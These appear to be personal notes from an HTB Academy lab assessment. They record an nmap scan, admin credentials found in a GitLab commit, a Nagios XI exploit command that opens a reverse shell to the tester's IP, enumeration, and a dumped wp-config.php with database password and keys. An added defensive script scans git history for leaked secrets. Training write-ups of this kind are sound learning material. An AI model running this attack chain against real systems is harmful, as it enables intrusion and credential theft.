
Assessment 2

nmap 10.129.235.11
Starting Nmap 7.93 ( https://nmap.org ) at 2025-09-13 11:36 EDT
Nmap scan report for gitlab.inlanefreight.local (10.129.235.11)
Host is up (0.097s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
389/tcp  open  ldap
443/tcp  open  https
8180/tcp open  unknown

80 / 443 have an inlanefreight website

8180 - gitlab instance

  • created a user
  • searching for projects, we find monitoring.inlanefreight.local
  • in the project, we see a commit with admin creds to the monitoring website
  • adding to /etc/hosts
  • logging in with the admin creds
  • using version - 5.7.5
  • trying - https://www.exploit-db.com/exploits/49422
  • python3 nagiosxi-5.7.x.py https://monitoring.inlanefreight.local nagiosadmin P@ssw0rd 10.10.14.6 8884
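
The foothold above started from admin credentials left in a GitLab commit. As an added example (not part of the original notes), here is a defender-side check that scans `git log -p --all` output for literal credentials in added lines, so a secret removed by a later commit is still reported. The sample log, hostnames, and pattern list are constructed assumptions.

```python
import re

# Constructed `git log -p` excerpt (not from the page's GitLab project).
SAMPLE_LOG = """\
commit 1111111111111111111111111111111111111111
    add monitoring check
diff --git a/check.sh b/check.sh
--- /dev/null
+++ b/check.sh
@@ -0,0 +1,2 @@
+#!/bin/sh
+curl -u "monitor:EXAMPLE-Passw0rd" https://monitoring.example.test/api
commit 2222222222222222222222222222222222222222
    read credentials from the environment
diff --git a/check.sh b/check.sh
--- a/check.sh
+++ b/check.sh
@@ -1,2 +1,2 @@
 #!/bin/sh
-curl -u "monitor:EXAMPLE-Passw0rd" https://monitoring.example.test/api
+curl -u "$MON_USER:$MON_PASS" https://monitoring.example.test/api
"""

PATTERNS = [  # illustrative list; each regex captures the candidate secret in group 1
    ("assignment", re.compile(
        r"(?i)(?:password|passwd|pwd|secret|token)\w*['\"]?\s*[:=]\s*['\"]?([^\s'\"]+)")),
    ("basic-auth", re.compile(r"(?:-u|--user)\s+['\"]?[^\s:'\"]+:([^\s'\"]+)")),
    ("url-creds", re.compile(r"[a-z][a-z0-9+.-]*://[^\s/:@]+:([^\s/@]+)@")),
]

def is_placeholder(value):
    # Variable references and template markers are not literal secrets.
    return value.startswith(("$", "<", "{{", "%"))

def scan_history(log_text):
    """Return (short commit, file, pattern name) for each added line with a literal secret."""
    findings, commit, path = [], None, None
    for line in log_text.splitlines():
        if line.startswith("commit "):
            commit = line.split()[1][:8]
        elif line.startswith("+++ "):
            path = line[6:] if line.startswith("+++ b/") else line[4:]
        elif line.startswith("+") and commit:
            for kind, rx in PATTERNS:
                m = rx.search(line[1:])
                if m and not is_placeholder(m.group(1)):
                    findings.append((commit, path, kind))
    return findings

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_LOG):
        print(finding)
```

Any credential this reports should be rotated, since deleting it in a later commit leaves it readable in the history.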

we get shell as www-data

  • the folder where we spawn has a <hash>_flag.txt

More enum:
  • user nagios has a cookie.txt - didn't seem important
  • /var/www has a few websites
    • app.ilf.local - nothing
    • mrtg - nothing
    • html - seems like our 80/443 website
    • blog.ilf.local - wordpress website
  • added blog.ilf.local to /etc/hosts
  • reading through /wp-config.php

    // ** MySQL settings - You can get this info from your web host ** //
    /** The name of the database for WordPress */                                           
    define( 'DB_NAME', 'wordpress' );   
    
    /** MySQL database username */                                                         
    define( 'DB_USER', 'wordpressadm' );                                                    
    /** MySQL database password */                                                          
    define( 'DB_PASSWORD', 'HTB_@cademy_WP!' );   
    
    /** MySQL hostname */                                                                 
    define( 'DB_HOST', 'localhost' );                                                       
    /** Database charset to use in creating database tables. */                             
    define( 'DB_CHARSET', 'utf8' );                                                         
    /** The database collate type. Don't change this if in doubt. */                        
    define( 'DB_COLLATE', '' );                                                             
    /**#@+                                                                                                                                                                                                             
     * Authentication unique keys and salts.                                                            
     * Change these to different unique phrases! You can generate these using                                                                                                                                          
     * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
     *
     * You can change these at any point in time to invalidate all existing cookies.
     * This will force all users to have to log in again.
     *
     * @since 2.6.0
     */
    define('AUTH_KEY',         'p0YGoceyDDV+%w)uy&;4{Hc@}Ge^++ydjC^w~Sdc<wofL$~QxQ7?OreLT9G~I}Z:');
    define('SECURE_AUTH_KEY',  'y&C}JsD%*5Qih^__dWL(WLqZ9q>tzU;(px>KL[X4sn<(.b~tFru:(gWNbSE/jd5y');
    define('LOGGED_IN_KEY',    '^&g5_3p`Ct 65J1(B}JeI.r[N}g;i!e)OA/^!Z:3FMku)4~-}xSY)~yZ9t|AL8g|');
    define('NONCE_KEY',        'F{ Qq(&r|B,+>OG-HzTcwKp-2_/L*zaW(S2z0[Q%4NXX^{$gxI+FJ()}[+8{+C7)');
    define('AUTH_SALT',        '{42dgC+13-(v_$fd7+nKm>~A(&%6.~TIPux*pj#TE|(]0ooSf9TjHX:`.ijv1,NK');
    define('SECURE_AUTH_SALT', '}>z`-z4!,2.?G&f!eW5gd)^hVoYlh+}!>1cu!PSO3[E-{m/|yC$JgX*x?3g hB1]');
    define('LOGGED_IN_SALT',   '^an]TQGa?9-m}=hLlzsolA]ZGSx]aFLV,;Wn3D?JGrUa7nT24x{07k4Q.%&89]Jk');
    define('NONCE_SALT',       '[Zn2UfL-*qVR,cms9V^x2.3`U3gQK].jX@MADSt|{^[t N4 ?9]J*XB;h-}9,=9>');
    /**#@-*/